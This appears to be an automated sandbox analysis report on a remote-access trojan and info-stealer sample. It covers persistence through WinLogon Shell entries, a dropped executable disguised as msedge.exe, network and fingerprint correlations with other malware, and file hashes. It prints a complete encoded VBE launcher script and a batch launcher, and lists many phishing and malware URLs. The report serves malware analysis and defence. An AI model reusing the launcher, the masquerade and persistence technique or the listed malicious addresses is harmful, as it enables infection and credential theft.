20:25:41	Autostart	Run: WinLogon Shell "C:\Users\user\AppData\Local\Idle.exe"
20:25:49	Autostart	Run: WinLogon Shell "C:\Edge\msedge.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.197.40	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
188.114.96.3	docs.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+la3znjNy02hfQbCEg==&AL0=9rN46F
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	wwvmicrosx.live/office365/office_cookies/main/
	http://fitur-dana-terbaru-2024.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	fitur-dana-terbaru-2024.pages.dev/favicon.ico
	http://mobilelegendsmycode.com/	Get hash	malicious	Unknown	Browse	mobilelegendsmycode.com/favicon.ico
	http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwE	Get hash	malicious	WinSearchAbuse	Browse	download.all-instructions.com/Downloads/Instruction%2021921.pdf.lnk
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
offeviablwke.site	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.84.213
offeviablwke.site	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	172.67.197.40
file.garden	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.97.3
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.84.213
	https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.1.169
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	docs.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true	Get hash	malicious	Unknown	Browse	104.18.35.212
	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
CLOUDFLARENETUS	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.84.213
	https://mafanikiosacco-my.sharepoint.com/:f:/p/info/EgPH1s54501Ki8NU-gutZLABOsAyZ-dhIPJaM6vWEXJqUQ?e=PJpX12	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.21.1.169
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	docs.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	https://myworkspace183015a0ec.myclickfunnels.com/reviewdoc--96b32?preview=true	Get hash	malicious	Unknown	Browse	104.18.35.212
	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://vh.gskoffihoura.com/okta.vailhealth.org/oauth2/v1/authorize&client_id=okta-2b1959c8-bcc0-56eb	Get hash	malicious	Unknown	Browse	1.1.1.1
AKAMAI-ASUS	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254
	https://mandrillapp.com/track/click/30481271/www.doku.com?p=eyJzIjoibU5DZVhaM2w5MjJrQzZUaXptdlBXY2VNN2VnIiwidiI6MSwicCI6IntcInVcIjozMDQ4MTI3MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3d3dy5kb2t1LmNvbVxcXC91XFxcL01PMjI3cXdcIixcImlkXCI6XCIxZjY5Nzc3NzBlZjU0NTg3OThmOTMwN2YyMzc5Y2VlOFwiLFwidXJsX2lkc1wiOltcImZiY2Y5N2U4ZWY0YzlkODk1Y2MxMGM4Y2YzYTdkZjc5YzU2NzU4MTlcIl19In0	Get hash	malicious	Unknown	Browse	104.102.35.2
	http://tr.padlet.com/redirect/?url=http://dctools.mooo.com/smileyes/dhe/succes/pure/dad/mom/kid/she/qwerty/careese.pfund@stcotterturbine.com	Get hash	malicious	HTMLPhisher	Browse	173.223.116.167
	Xkci1BfrmX.lnk	Get hash	malicious	LonePage	Browse	23.56.162.185
	Snc2ZNvAZP.pdf	Get hash	malicious	Unknown	Browse	23.56.162.185
	Purchase Order IBT LPO-2320.eml	Get hash	malicious	Unknown	Browse	23.56.162.185
	SCAN_Client_No_XP9739270128398468932393.pdf	Get hash	malicious	HTMLPhisher	Browse	96.17.64.189

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	TJWbSGBK0I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	4sTTCruY06.exe	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	Cr4745ElZg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, BitCoin Miner, SilentXMRMiner	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	188.114.96.3
	Setup_10024.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
a0e9f5d64349fb13191bc781f81f42e1	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254 172.67.197.40
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254 172.67.197.40
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254 172.67.197.40
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	104.102.49.254 172.67.197.40
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	104.102.49.254 172.67.197.40
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254 172.67.197.40
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 172.67.197.40
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254 172.67.197.40
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254 172.67.197.40
	PO554830092024.xls	Get hash	malicious	Unknown	Browse	104.102.49.254 172.67.197.40

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Edge\msedge.exe	povqqKBcoP.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
C:\Users\user\AppData\Local\Idle.exe	povqqKBcoP.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	UY9hUZn4CQ.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	gh3zRWl4or.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse
	seoI30IZZr.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Edge\61a52ddc9dd915

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with very long lines (461), with no line terminators
Category:	dropped
Size (bytes):	461
Entropy (8bit):	5.816240753615295
Encrypted:	false
SSDEEP:	6:MfPXcR5jBlFeDHdNx0per7jlURYTKiZCUTRSrQnmW8CsCXhRj3rwVHYVZ5MmBiPe:MfWrl2Hp0Mr72s4sOCXhtrwOZDSs00
MD5:	5347B05E72ACEDE530ACFE1AE401967A
SHA1:	E677BC8260091A3E620AE136212DBB582F161FBA
SHA-256:	D2D7A6C660E24FCB481E20AE8803519D1564148BEE2B9F4C4BC1E41922261C82
SHA-512:	C2380FC45FB9998AFDE7E0A21AFA7C35B7D0FCDAED87F1AF6F3563E0BFB0E2E1CF541E91EC0BB48E75AE29CC840DBC0D18C3CFD5B40A40C8B663C1DAC057AB1A
Malicious:	false
Preview:	fS33RViXlp95Y2OIhlZj2BPpjdF4opH2LxpCeLVPpGxY9MMAtCHVPqjeDNUyQnt5hGtlMMnVQK3wN0qXQFLliwmfNL8Q1g9CW202ckxhZwEFwwQNh6iKcIXveOYBNXdtL1aU9x4pRoMvshtb4vs48yjOeFXOMwTBTU44V6OuC23x6mD7e6GboivWRM03ZqcfVKcXmzF8h82F5wS2CatPp1XujhmJFUUVaXcvJpUp1I4pqpbf47196M0dxsyFM52MogphUgsXFEYg7rD3GGPIdUZNg98b0Pc5PrBJ93LXOd31yTfFo58GqutTHcBUhRh0mcQPp44N5139bhYNd3w4QWPf8rCh20066CPVDPZuBvKy1t1jDx1oemjPNvR81WVFB6DYRDKNdC3fMbnP0cdE9McUc9IR8b2oaEw5pdR9nnKcsEDwHBHY3QGzet6S52PCJPFHosjWLdaWB

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	data
Category:	dropped
Size (bytes):	229
Entropy (8bit):	5.838240404374592
Encrypted:	false
SSDEEP:	6:GbvwqK+NkLzWbHOurFnBaORbM5nCI7hHt16fIRVbbP:GKMCzWLOuhBaORbQCsHt1nDbP
MD5:	569A28CF34F3A51DB0CC4AA0369773EC
SHA1:	23488377EA3A37B61750952D541B867AB3D8B424
SHA-256:	86300641B7D7CF7227C163FB4CC84B0115875D923949E957B18EAED9847F0329
SHA-512:	3E7855DDA257477691618305B2979EB20D33FFBEBC8F614BE736D23482E49A04A1D0AE837789B3171575F96CB197DDA04A84BB284599E0E18769473594FF6051
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^zAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vFX!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z39o.zzsk0t6zWVK8YnfXrhj0kb.wl)/pjVSyr!9)jc#ZT%s1c-4TR4COr~~!B~6lsk+hkAAAA==^#~@.

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.968079981014333
Encrypted:	false
SSDEEP:	3:cNjpJgFNeUpnbG0DLagi0m:U1ueUJbGwLBE
MD5:	68B1414DBD5A51F2F75912513D1A035E
SHA1:	A45E03F8EDADA7FDF3697EAA6D88785CD464D373
SHA-256:	48F984A346659261B6A2CFBDF6C558A09201EB4A0DBA69F56F7A403EA7B8EB9E
SHA-512:	AA4921FCAACEE5472C7BBAA7BD1ECCB837689F988650DCE644968D6CE422C9BB1D5B4D0304F0DD5C0D643E5B3CF1B65752B704528804AC24E5BFC38D5C1205FC
Malicious:	false
Preview:	%ZrAnvfoASNUfO%%CBvOlEkO%..%VxFgqUHpnZxb%"C:\Edge/msedge.exe"%oRfhCeQ%

C:\Edge\msedge.exe

Download File

Process:	C:\Windows\Speech\kdmapper.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: povqqKBcoP.exe, Detection: malicious, Browse Filename: 4tXm5yPtiy.exe, Detection: malicious, Browse Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse Filename: gh3zRWl4or.exe, Detection: malicious, Browse Filename: seoI30IZZr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.448520842480604
Encrypted:	false
SSDEEP:	24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
MD5:	B5189FB271BE514BEC128E0D0809C04E
SHA1:	5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
SHA-256:	E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
SHA-512:	F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
Malicious:	false
Preview:	.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9005333296961084
Encrypted:	false
SSDEEP:	48:6ym1t9xZ8RxeOAkFJOcV4MKe28dQcSy4/vqBH/uulB+hnqXSfbNtm:o6xvxVx9wqSvkRTkZzNt
MD5:	ADF24C18E0EDEC447E2B4524E5D6DD1F
SHA1:	336217FE33CD2CA3750E0D4E95B1751BC7800C7F
SHA-256:	EFA987EA2403DA7114ABA959776861A958B9CFCFFEA859426923AC41ACCBB506
SHA-512:	873466ED03C22B99C68EC914230814D82085F0CAA9417E9E2368A93D4F8EF66129523DD0F4A04459FF56174783128C16721CE462F517F654DDC9BE9ECACF4A6C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(.....0..!.......r...pr...p.{....(....(....&..&......................0..........r...p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\Users\user\AppData\Local\6ccacd8608530f

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with very long lines (613), with no line terminators
Category:	dropped
Size (bytes):	613
Entropy (8bit):	5.879141795742085
Encrypted:	false
SSDEEP:	12:ZgKJ4ngvuXpcbV4FvCQZoKeXH04kSmN8BA/TANtxVK/QRDD:ZgEagOpGKkbk5NaA7AbxVKYRDD
MD5:	309D3DC3EC4676054CC3CE510BEDAF71
SHA1:	C9A86F42F38B99FC3D03A9AFF06A82A557516F0C
SHA-256:	5526B9CE6A6ADC44A77C6C681C0549B813BEA3712BF049876A753450161BAF17
SHA-512:	6930EB555C40F2457FD1EC914ACB2804323D259EB41674505AA9A3D84B207AC7983DC85078D6A5CF08C7FA83F547636A87D71BE854997BE456085FE796096F57
Malicious:	false
Preview:	Y5VJ6TduJ87a6h9EvXISc96HZcvNZ0txeHhWjtSsqe5IqRmzMZp83rJY9NueiQVSOK6z9meCFZm7DybHz5B9Lv4x8IXV8xJZJm3gVx0j4n2dELVLwnpnOVHdPI00PIDRPMyb44vBEcFi2bswxMjVIgKxeaQN69TvjlN2X4Q12niwQjkyZECDjsJtBA6enhEEJT8RN0Z35rde8Yh5zcx27PM1cd1W7wOUidn6lTkjoII2PovncAoLuMH3HGzt9D5JdI5eukTf1OOyHTmxsN36HCjWWtzee0kkN8ZGsQ21rIUg7TwxeBBvJ8CaijIAuzBAnnlI3fEcVBP8rDYD7B9czzbO68hJI1H2HU2Usn486iZHtEteKFDtziKyLWM485Te4X0XLEVTHBgQZUf2PC8DxYDiJDIVa9ABO5MVNWTGutlxC3Y11Up56QqgUSNH593IBfCeHJo3s2TEwPgPpReGTEE8OpB4ILKu0cwh13trpwNE7muFv8cofwy6aDQcItvgriNTc9Yvhwah1AAm56JJtgODozGxnRj5BqWYYamwkqGtWRFaDngMklxLUKpm3kHQMefLomOeTWjCafrWupuAuXVZ2LENv939jzg1v

C:\Users\user\AppData\Local\Idle.exe

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Idle.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Idle.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: povqqKBcoP.exe, Detection: malicious, Browse Filename: 4tXm5yPtiy.exe, Detection: malicious, Browse Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse Filename: gh3zRWl4or.exe, Detection: malicious, Browse Filename: seoI30IZZr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Idle.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Idle.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.370675888495854
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
MD5:	5ACBB013936118762389287938AE0885
SHA1:	12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
SHA-256:	28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
SHA-512:	E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, 